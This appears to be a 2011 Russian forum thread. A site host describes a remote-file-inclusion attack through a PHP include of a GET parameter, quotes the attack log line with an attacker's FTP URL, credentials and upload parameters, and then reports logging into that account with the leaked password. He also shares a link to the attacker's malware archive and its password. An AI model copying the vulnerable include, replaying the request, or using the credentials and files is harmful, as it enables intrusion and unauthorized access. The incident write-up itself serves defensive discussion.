Бразильский крякер

0

1

Имею несчастье размещать у себя сайт, написанный командой жутких быдлокодеров, которые даже вирусы со своей венды поудалять нормально не могут, не говоря уже о том, чтобы писать вменяемый php-код. Примерно раз в неделю мне приходит письмо от хостера о том, что на сайте вновь обнаружена малварь: то exe-шник с вирусом, то копия сайта банка. В прошлые разы вредоносный контент попадал на сайт через вирус, который слушал сетевой трафик в винде и ловил в незашифрованном ftp логин и пароль, отсылая их владельцу, который уже закачивал на сайт что хотел.

Но в этот раз было что-то новое: похоже, доступ к файлам сайта взломщик таки потерял, но там как у него была возможность изучить код сайта ранее, найти уязвимость там не составило труда. Уязвимый кусок выглядел так:

if(file_exists($helloworld)) {
    include($helloworld);
}

где $helloworld берётся из $_GET. Если попробовать подставить туда http-ссылку, то include() не выполнится: file_exists() всегда возвращает false для таких ссылок. Остаётся ftp, что и видно в заботливо предоставленных хостером логах:

189.24.109.181 - - [27/Apr/2011:19:52:52 +0400] "POST
/index.php?id=ftp://tramponovo1:lucas123@ftp.webcindario.com/jm.php?http://www.jak.com/manual/CVS/.../rhe.ganteng?&action=upload&chdir=/www/***/users/***-***ru/www/htdocs/fame/
HTTP/1.0" 200 31520
"http://***.ru/index.php?id=ftp://tramponovo1:lucas123@ftp.webcindario.com/jm.php?http://www.jak.com/manual/CVS/.../rhe.ganteng?&chdir=/www/***/users/***-***ru/www/htdocs/fame/"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.16) Gecko/20110319
Firefox/3.6.16"

Похоже, взломщику стало лень настраивать публичный ftp и он решил подсунуть уязвимому скрипту свой. Как результат - засвеченный пароль. Пароль подошёл, и я сначала скачал содержимое его аккаунта, а потом удалил, оставив записку. Собственно, в его содержимом и заключается смысл этого топика: вдруг там есть что-нибудь интересное, что поможет насолить крякеру, просматривать же 68 файлов у меня сейчас нет никакого желания.

Файлы взломщика: http://ge.tt/6ZCiOU0?c

Пароль к архиву - gregore

Ссылка

←	Какая ОС используется в фотоаппаратах Canon?

[автосрач][вперде] Д.Медведев предложил отменить техосмотр автомобилей

→

чето тут не так

mikhalich ★★
(28.04.11 21:43:46 MSK)

Ссылка

> Однострочник на питоне для вывода пароля к архиву:

«Однострочник на перле»?

~~geekless~~ ★★
(28.04.11 21:58:17 MSK)

Ответ на: комментарий от geekless 28.04.11 21:58:17 MSK

«Однострочник на перле»?

На питоне невозможно написать такой однострочник.

RommeDeSerieux ★
(28.04.11 21:59:58 MSK) автор топика

Ответ на: комментарий от RommeDeSerieux 28.04.11 21:59:58 MSK

Верю как родному.

~~geekless~~ ★★
(28.04.11 22:01:14 MSK)

Ответ на: комментарий от geekless 28.04.11 22:01:14 MSK

Ладно, раз слово «однострочник» вызывает такую рефлексивную реакцию, то заменил на пароль чистым текстом.

RommeDeSerieux ★
(28.04.11 22:04:41 MSK) автор топика

Ссылка

Мда, ну и кулхацкеры нынче пошли.

drull ★☆☆☆
(28.04.11 22:13:25 MSK)

Ссылка

Мне как-то малварь тоже пришла на ssh (из Польши). Отправил в виде архива Касперычу на анализ этого ботнета.

pacify ★★★★★
(28.04.11 22:13:31 MSK)

Ответ на: комментарий от pacify 28.04.11 22:13:31 MSK

И он понял, что афера с Польшой не получилась? Анализ неудавшихся действий.

Darth_Revan ★★★★★
(28.04.11 22:20:56 MSK)

Ссылка

Похоже, взломщику стало лень настраивать публичный ftp и он решил подсунуть уязвимому скрипту свой.

С чего ты взял что это его? Обычно как раз используют подставной.

true_admin ★★★★★
(28.04.11 22:39:29 MSK)

Ответ на: комментарий от true_admin 28.04.11 22:39:29 MSK

С чего ты взял что это его? Обычно как раз используют подставной.

Если бы был чужой аккаунт, то там бы и чужие данные были, я думаю. А так только явно злонамеренные файлы.

RommeDeSerieux ★
(28.04.11 22:46:15 MSK) автор топика

Ссылка

Ответ на: комментарий от pacify 28.04.11 22:13:31 MSK

> Вернул назад в виде архива Касперычу

Все опечатки исправлены.

~~geekless~~ ★★
(28.04.11 22:51:50 MSK)

Ссылка

>Имею несчастье размещать у себя сайт, написанный командой жутких быдлокодеров

Что за бабская мода - говорить о себе в третьем лице?

Led ★★★☆☆
(29.04.11 00:38:41 MSK)

Ответ на: комментарий от Led 29.04.11 00:38:41 MSK

Имею несчастье…

Это первое.

arknir ★
(29.04.11 01:08:35 MSK)

Ссылка

> вредоносный контент попадал на сайт через вирус, который слушал сетевой трафик в винде и ловил в незашифрованном ftp логин и пароль, отсылая их владельцу, который уже закачивал на сайт что хотел.

вот это с*ка зараза та еще.
каждый день сотни клиентов-виндузятников негодуют, мол «на хостинге завелся вирус и закачал в мой акаунт левые файлы». приходится каждому по пять раз обьяснять, приводя логи и прочее, что он ссзб.
еще одна разновидность вирусов даже не слушает сетевой трафик, а просто вытягивает сохраненные в файлзилах и тоталах пароли к фтп.

Komintern ★★★★★
(29.04.11 09:31:48 MSK)